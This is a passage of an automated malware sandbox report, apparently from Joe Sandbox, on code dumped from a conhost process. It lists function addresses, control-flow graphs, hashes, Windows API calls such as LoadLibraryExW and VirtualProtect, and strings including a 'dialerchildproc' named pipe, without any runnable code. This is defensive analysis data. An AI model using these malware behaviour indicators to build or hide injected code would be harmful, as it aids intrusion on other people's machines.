                                                                  • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction ID: 8a582c266cdb55b462c407256a536ff97da4f752aa46bd1d958f90a90b4f8d2e
                                                                  • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction Fuzzy Hash: 3CE19D72A05B408AEB62EF69D68C39E37A0F759B98F100115EFC957B99CB34D5C2C708
                                                                  Function 000002408A29A974 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 321 2408a29a974-2408a29a9dc call 2408a29b844 324 2408a29ae43-2408a29ae4b call 2408a29cb78 321->324 325 2408a29a9e2-2408a29a9e5 321->325 325->324 326 2408a29a9eb-2408a29a9f1 325->326 328 2408a29aac0-2408a29aad2 326->328 329 2408a29a9f7-2408a29a9fb 326->329 331 2408a29aad8-2408a29aadc 328->331 332 2408a29ad93-2408a29ad97 328->332 329->328 333 2408a29aa01-2408a29aa0c 329->333 331->332 336 2408a29aae2-2408a29aaed 331->336 334 2408a29ad99-2408a29ada0 332->334 335 2408a29add0-2408a29adda call 2408a299a64 332->335 333->328 337 2408a29aa12-2408a29aa17 333->337 334->324 338 2408a29ada6-2408a29adcb call 2408a29ae4c 334->338 335->324 349 2408a29addc-2408a29adfb call 2408a297d70 335->349 336->332 340 2408a29aaf3-2408a29aafa 336->340 337->328 341 2408a29aa1d-2408a29aa27 call 2408a299a64 337->341 338->335 345 2408a29ab00-2408a29ab37 call 2408a299e40 340->345 346 2408a29acc4-2408a29acd0 340->346 341->349 352 2408a29aa2d-2408a29aa58 call 2408a299a64 * 2 call 2408a29a154 341->352 345->346 357 2408a29ab3d-2408a29ab45 345->357 346->335 350 2408a29acd6-2408a29acda 346->350 354 2408a29acea-2408a29acf2 350->354 355 2408a29acdc-2408a29ace8 call 2408a29a114 350->355 389 2408a29aa78-2408a29aa82 call 2408a299a64 352->389 390 2408a29aa5a-2408a29aa5e 352->390 354->335 356 2408a29acf8-2408a29ad05 call 2408a299ce4 354->356 355->354 365 2408a29ad0b-2408a29ad13 355->365 356->335 356->365 362 2408a29ab49-2408a29ab7b 357->362 367 2408a29ab81-2408a29ab8c 362->367 368 2408a29acb7-2408a29acbe 362->368 370 2408a29ad19-2408a29ad1d 365->370 371 2408a29ae26-2408a29ae42 call 2408a299a64 * 2 call 2408a29cad8 365->371 367->368 372 2408a29ab92-2408a29abab 367->372 368->346 368->362 374 2408a29ad1f-2408a29ad2e call 2408a29a114 370->374 375 2408a29ad30 370->375 371->324 376 2408a29abb1-2408a29abf6 call 2408a29a128 * 2 372->376 377 2408a29aca4-2408a29aca9 372->377 385 2408a29ad33-2408a29ad3d call 2408a29b8dc 374->385 375->385 402 2408a29abf8-2408a29ac1e call 2408a29a128 call 2408a29b068 376->402 403 2408a29ac34-2408a29ac3a 376->403 382 2408a29acb4 377->382 382->368 385->335 400 2408a29ad43-2408a29ad91 call 2408a299d74 call 2408a299f80 385->400 389->328 406 2408a29aa84-2408a29aaa4 call 2408a299a64 * 2 call 2408a29b8dc 389->406 390->389 394 2408a29aa60-2408a29aa6b 390->394 394->389 399 2408a29aa6d-2408a29aa72 394->399 399->324 399->389 400->335 421 2408a29ac20-2408a29ac32 402->421 422 2408a29ac45-2408a29aca2 call 2408a29a8a0 402->422 408 2408a29acab 403->408 409 2408a29ac3c-2408a29ac40 403->409 427 2408a29aabb 406->427 428 2408a29aaa6-2408a29aab0 call 2408a29b9cc 406->428 414 2408a29acb0 408->414 409->376 414->382 421->402 421->403 422->414 427->328 431 2408a29ae20-2408a29ae25 call 2408a29cad8 428->431 432 2408a29aab6-2408a29ae1f call 2408a2996dc call 2408a29b424 call 2408a2998d0 428->432 431->371 432->431
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction ID: 8fad1136afd327382d3350423b59f1bba83968f396f9c5b3309f7737dd36f762
                                                                  • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction Fuzzy Hash: ADE17E72704B408AEB34DB6AD68879E7BA4F749B98F180155EF8957F99CB34C5C1CB00
                                                                  Function 000002408A29F7C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 442 2408a29f7c4-2408a29f816 443 2408a29f81c-2408a29f81f 442->443 444 2408a29f907 442->444 446 2408a29f829-2408a29f82c 443->446 447 2408a29f821-2408a29f824 443->447 445 2408a29f909-2408a29f925 444->445 448 2408a29f8ec-2408a29f8ff 446->448 449 2408a29f832-2408a29f841 446->449 447->445 448->444 450 2408a29f843-2408a29f846 449->450 451 2408a29f851-2408a29f870 LoadLibraryExW 449->451 452 2408a29f84c 450->452 453 2408a29f946-2408a29f955 GetProcAddress 450->453 454 2408a29f926-2408a29f93b 451->454 455 2408a29f876-2408a29f87f GetLastError 451->455 456 2408a29f8d8-2408a29f8df 452->456 458 2408a29f957-2408a29f97e 453->458 459 2408a29f8e5 453->459 454->453 457 2408a29f93d-2408a29f940 FreeLibrary 454->457 460 2408a29f881-2408a29f898 call 2408a29cd58 455->460 461 2408a29f8c6-2408a29f8d0 455->461 456->449 456->459 457->453 458->445 459->448 460->461 464 2408a29f89a-2408a29f8ae call 2408a29cd58 460->464 461->456 464->461 467 2408a29f8b0-2408a29f8c4 LoadLibraryExW 464->467 467->454 467->461
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572
                                                                  • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction ID: 2bb4b6e0430cd9218f75abc1b8face2e93e6c144a68c9879fb49ec7bbbb465af
                                                                  • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction Fuzzy Hash: 6E41B431315A2091FBB5DB1BAA88B563791BB49FA0F0C41259F0E87F84EB78D4C58B10
                                                                  Function 000002408A29104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 468 2408a29104c-2408a2910b9 RegQueryInfoKeyW 469 2408a2910bf-2408a2910c9 468->469 470 2408a2911b5-2408a2911d0 468->470 469->470 471 2408a2910cf-2408a29111f RegEnumValueW 469->471 472 2408a2911a5-2408a2911af 471->472 473 2408a291125-2408a29112a 471->473 472->470 472->471 473->472 474 2408a29112c-2408a291135 473->474 475 2408a291147-2408a29114c 474->475 476 2408a291137 474->476 478 2408a291199-2408a2911a3 475->478 479 2408a29114e-2408a291193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 475->479 477 2408a29113b-2408a29113f 476->477 477->472 480 2408a291141-2408a291145 477->480 478->472 479->478 480->475 480->477
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436
                                                                  • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction ID: 21cd235243b833449a4ff2f5587f61f8a2bf6707ba15beecc756b479bdd18fcc
                                                                  • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction Fuzzy Hash: DB415573214B84D6E7A0CF66E58879E7BA1F388F98F448119DB8907B58DF38D589CB40
                                                                  Function 000002408A29D498 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • FlsGetValue.KERNEL32(?,?,?,000002408A29CC0E,?,?,?,?,?,?,?,?,000002408A29D3CD,?,?,00000001), ref: 000002408A29D4B7
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29CC0E,?,?,?,?,?,?,?,?,000002408A29D3CD,?,?,00000001), ref: 000002408A29D4D6
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29CC0E,?,?,?,?,?,?,?,?,000002408A29D3CD,?,?,00000001), ref: 000002408A29D4FE
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29CC0E,?,?,?,?,?,?,?,?,000002408A29D3CD,?,?,00000001), ref: 000002408A29D50F
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29CC0E,?,?,?,?,?,?,?,?,000002408A29D3CD,?,?,00000001), ref: 000002408A29D520
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: 1%$Y%
                                                                  • API String ID: 3702945584-1395475152
                                                                  • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction ID: 5cc28e8d6b6a460314d486e035352944372e75f9644a07bfbf1f8cafb2dc8d04
                                                                  • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction Fuzzy Hash: 8011813034525042FA78972FA7DDB6B2A415B84BB4F5C4724AB3906ED7DE78D4C25F00
                                                                  Function 000002408A292334 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                  • String ID: \\.\pipe\dialerchildproc
                                                                  • API String ID: 166002920-1933775637
                                                                  • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction ID: bbd292e3a311497343453d84250fdd13b35bec573ece26ebfdbd0d05645a45f2
                                                                  • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction Fuzzy Hash: 6F114F31714B5083E7208B26F54875A7761F789BA5F544315EB6A02EA8CF7CC189CF00
                                                                  Function 000002408A297940 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 511 2408a297940-2408a297946 512 2408a297948-2408a29794b 511->512 513 2408a297981-2408a29798b 511->513 515 2408a29794d-2408a297950 512->515 516 2408a297975-2408a2979b4 call 2408a297ff0 512->516 514 2408a297aa8-2408a297abd 513->514 520 2408a297acc-2408a297ae6 call 2408a297e84 514->520 521 2408a297abf 514->521 518 2408a297968 __scrt_dllmain_crt_thread_attach 515->518 519 2408a297952-2408a297955 515->519 533 2408a2979ba-2408a2979cf call 2408a297e84 516->533 534 2408a297a82 516->534 522 2408a29796d-2408a297974 518->522 524 2408a297961-2408a297966 call 2408a297f34 519->524 525 2408a297957-2408a297960 519->525 531 2408a297ae8-2408a297b1d call 2408a297fac call 2408a297e4c call 2408a298348 call 2408a298160 call 2408a298184 call 2408a297fdc 520->531 532 2408a297b1f-2408a297b50 call 2408a2981c0 520->532 526 2408a297ac1-2408a297acb 521->526 524->522 531->526 543 2408a297b61-2408a297b67 532->543 544 2408a297b52-2408a297b58 532->544 546 2408a297a9a-2408a297aa7 call 2408a2981c0 533->546 547 2408a2979d5-2408a2979e6 call 2408a297ef4 533->547 537 2408a297a84-2408a297a99 534->537 549 2408a297b69-2408a297b73 543->549 550 2408a297bae-2408a297bc4 call 2408a293620 543->550 544->543 548 2408a297b5a-2408a297b5c 544->548 546->514 563 2408a2979e8-2408a297a0c call 2408a29830c call 2408a297e3c call 2408a297e68 call 2408a29bc3c 547->563 564 2408a297a37-2408a297a41 call 2408a298160 547->564 554 2408a297c4f-2408a297c5c 548->554 555 2408a297b7f-2408a297b8d 549->555 556 2408a297b75-2408a297b7d 549->556 571 2408a297bfc-2408a297bfe 550->571 572 2408a297bc6-2408a297bc8 550->572 561 2408a297b93-2408a297ba8 call 2408a297940 555->561 576 2408a297c45-2408a297c4d 555->576 556->561 561->550 561->576 563->564 611 2408a297a0e-2408a297a15 __scrt_dllmain_after_initialize_c 563->611 564->534 586 2408a297a43-2408a297a4f call 2408a2981b0 564->586 574 2408a297c00-2408a297c03 571->574 575 2408a297c05-2408a297c1a call 2408a297940 571->575 572->571 573 2408a297bca-2408a297bec call 2408a293620 call 2408a297aa8 572->573 573->571 606 2408a297bee-2408a297bf3 573->606 574->575 574->576 575->576 594 2408a297c1c-2408a297c26 575->594 576->554 597 2408a297a51-2408a297a5b call 2408a2980c8 586->597 598 2408a297a75-2408a297a80 586->598 601 2408a297c28-2408a297c2f 594->601 602 2408a297c31-2408a297c41 594->602 597->598 610 2408a297a5d-2408a297a6b 597->610 598->537 601->576 602->576 606->571 610->598 611->564 612 2408a297a17-2408a297a34 call 2408a29bbf8 611->612 612->564
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID:
                                                                  • API String ID: 190073905-0
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: a9e9bb5328127e4d5f3f08f0d72b2a3f6a39a8029a23c9eb6b97e4965b81692f
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: 0681B43170064186FB78AB6F97D9B9B6B91A785F80F1C40259B4947F96DB38C9C78F00
                                                                  Function 000002408A29A1F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002408A29A3B3,?,?,?,000002408A299B9C,?,?,?,?,000002408A2996BD), ref: 000002408A29A279
                                                                  • GetLastError.KERNEL32(?,?,?,000002408A29A3B3,?,?,?,000002408A299B9C,?,?,?,?,000002408A2996BD), ref: 000002408A29A287
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002408A29A3B3,?,?,?,000002408A299B9C,?,?,?,?,000002408A2996BD), ref: 000002408A29A2B1
                                                                  • FreeLibrary.KERNEL32(?,?,?,000002408A29A3B3,?,?,?,000002408A299B9C,?,?,?,?,000002408A2996BD), ref: 000002408A29A2F7
                                                                  • GetProcAddress.KERNEL32(?,?,?,000002408A29A3B3,?,?,?,000002408A299B9C,?,?,?,?,000002408A2996BD), ref: 000002408A29A303
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                  • String ID: api-ms-
                                                                  • API String ID: 2559590344-2084034818
                                                                  • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction ID: de6f46274b704ba40738bf3eef57c5b6ad785ce075c2bcb14a505a1eb100e408
                                                                  • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction Fuzzy Hash: 2131C431702B4095EE329B4BAA88B562B94F708FA0F5D05259F1E07F91DF39D5C6CB00
                                                                  Function 000002408A2A41E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                  • String ID: CONOUT$
                                                                  • API String ID: 3230265001-3130406586
                                                                  • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction ID: 28c1958d75fad3510e3d85040f47546b7a5e8836a2e4408dbab6e218ef05a4e7
                                                                  • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction Fuzzy Hash: 7E116032310B5086E7608B5BEA8831967A4F788BE5F044215EB6E87F94CF38E8848B40
                                                                  Function 000002408A293BC0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                  • String ID: wr
                                                                  • API String ID: 1092925422-2678910430
                                                                  • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction ID: 5e5a353675d72f869b81ff16ecbed8a03f8347fedfe551c5579f1f093f18abbd
                                                                  • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction Fuzzy Hash: F0118B36300B4182EB649B2AE58C76A66A1F788F94F080428DF8D03F94EF3DD5D88B04
                                                                  Function 000002408A295F60 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Current$Context
                                                                  • String ID:
                                                                  • API String ID: 1666949209-0
                                                                  • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction ID: 846c293be091fd7fe1fd5e3779cccd28122c1c148bb8d23bf259577605930977
                                                                  • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction Fuzzy Hash: 56D18876308B8886DA70DB1AE59875ABBA0F788F94F540116EBCD47BA5CF38C591CF10
                                                                  Function 000002408A2931CC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID: dialer
                                                                  • API String ID: 756756679-3528709123
                                                                  • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction ID: f8bcaffac90bfc331d76808b0ea06013533e61bff56cb75c28ecb3ca2b43f933
                                                                  • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction Fuzzy Hash: 4E318431B01B5182EB64DF6BE688B6A6BA1FB54F80F0840288F5847F55EF34D8F58B00
                                                                  Function 000002408A29D3D0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D3DF
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D415
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D442
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D453
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D464
                                                                  • SetLastError.KERNEL32(?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29D47F
